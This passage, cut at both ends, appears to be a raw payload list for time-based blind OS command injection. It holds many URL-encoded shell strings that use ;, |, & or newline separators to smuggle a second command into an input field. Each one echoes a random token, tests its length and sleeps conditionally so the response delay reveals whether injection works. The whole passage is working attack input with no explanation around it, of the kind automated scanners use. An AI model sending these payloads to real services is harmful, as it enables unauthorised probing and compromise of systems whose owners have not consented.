ep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20LJKRDD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20LJKRDD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%7C%20%5B%201%20-ne%20%24%28echo%20LAMXKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%202%20-ne%20%24%28echo%20LAMXKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%203%20-ne%20%24%28echo%20LAMXKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%204%20-ne%20%24%28echo%20LAMXKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%205%20-ne%20%24%28echo%20LAMXKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%206%20-ne%20%24%28echo%20LAMXKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%207%20-ne%20%24%28echo%20LAMXKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%208%20-ne%20%24%28echo%20LAMXKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%209%20-ne%20%24%28echo%20LAMXKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TMPVMS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TMPVMS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TMPVMS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TMPVMS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TMPVMS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TMPVMS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TMPVMS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TMPVMS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TMPVMS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%0A%20str%3D%24%28echo%20FWGGRQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20FWGGRQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20FWGGRQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20FWGGRQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20FWGGRQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20FWGGRQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20FWGGRQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20FWGGRQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20FWGGRQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%3B%20str%3D%24%28echo%20KMVEIH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20KMVEIH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20KMVEIH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20KMVEIH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20KMVEIH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20KMVEIH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20KMVEIH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20KMVEIH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20KMVEIH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%7C%20%5B%201%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%202%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%203%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%204%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%205%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%206%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%207%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%208%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%209%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TPCDNB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TPCDNB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TPCDNB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TPCDNB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TPCDNB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TPCDNB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TPCDNB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TPCDNB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TPCDNB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%0A%20str%3D%24%28echo%20KTBJHD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20KTBJHD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20KTBJHD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20KTBJHD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20KTBJHD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20KTBJHD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20KTBJHD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20KTBJHD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20KTBJHD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20SDKEGM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20SDKEGM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20SDKEGM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20SDKEGM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20SDKEGM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20SDKEGM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20SDKEGM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20SDKEGM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20SDKEGM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%7C%20%5B%201%20-ne%20%24%28echo%20PGFHFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%202%20-ne%20%24%28echo%20PGFHFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%203%20-ne%20%24%28echo%20PGFHFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%204%20-ne%20%24%28echo%20PGFHFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%205%20-ne%20%24%28echo%20PGFHFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%206%20-ne%20%24%28echo%20PGFHFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%207%20-ne%20%24%28echo%20PGFHFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%208%20-ne%20%24%28echo%20PGFHFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%209%20-ne%20%24%28echo%20PGFHFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYDPRO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYDPRO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYDPRO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYDPRO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYDPRO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYDPRO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYDPRO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYDPRO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYDPRO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%0A%20str%3D%24%28echo%20FUFPKN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20FUFPKN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20FUFPKN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20FUFPKN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20FUFPKN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20FUFPKN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20FUFPKN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20FUFPKN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20FUFPKN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20OIPHJR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20OIPHJR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20OIPHJR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20OIPHJR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20OIPHJR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20OIPHJR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20OIPHJR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20OIPHJR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20OIPHJR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%7C%20%5B%201%20-ne%20%24%28echo%20IFEFQD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%202%20-ne%20%24%28echo%20IFEFQD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%203%20-ne%20%24%28echo%20IFEFQD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%204%20-ne%20%24%28echo%20IFEFQD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%205%20-ne%20%24%28echo%20IFEFQD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%206%20-ne%20%24%28echo%20IFEFQD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%207%20-ne%20%24%28echo%20IFEFQD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%208%20-ne%20%24%28echo%20IFEFQD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%209%20-ne%20%24%28echo%20IFEFQD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWNHUW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%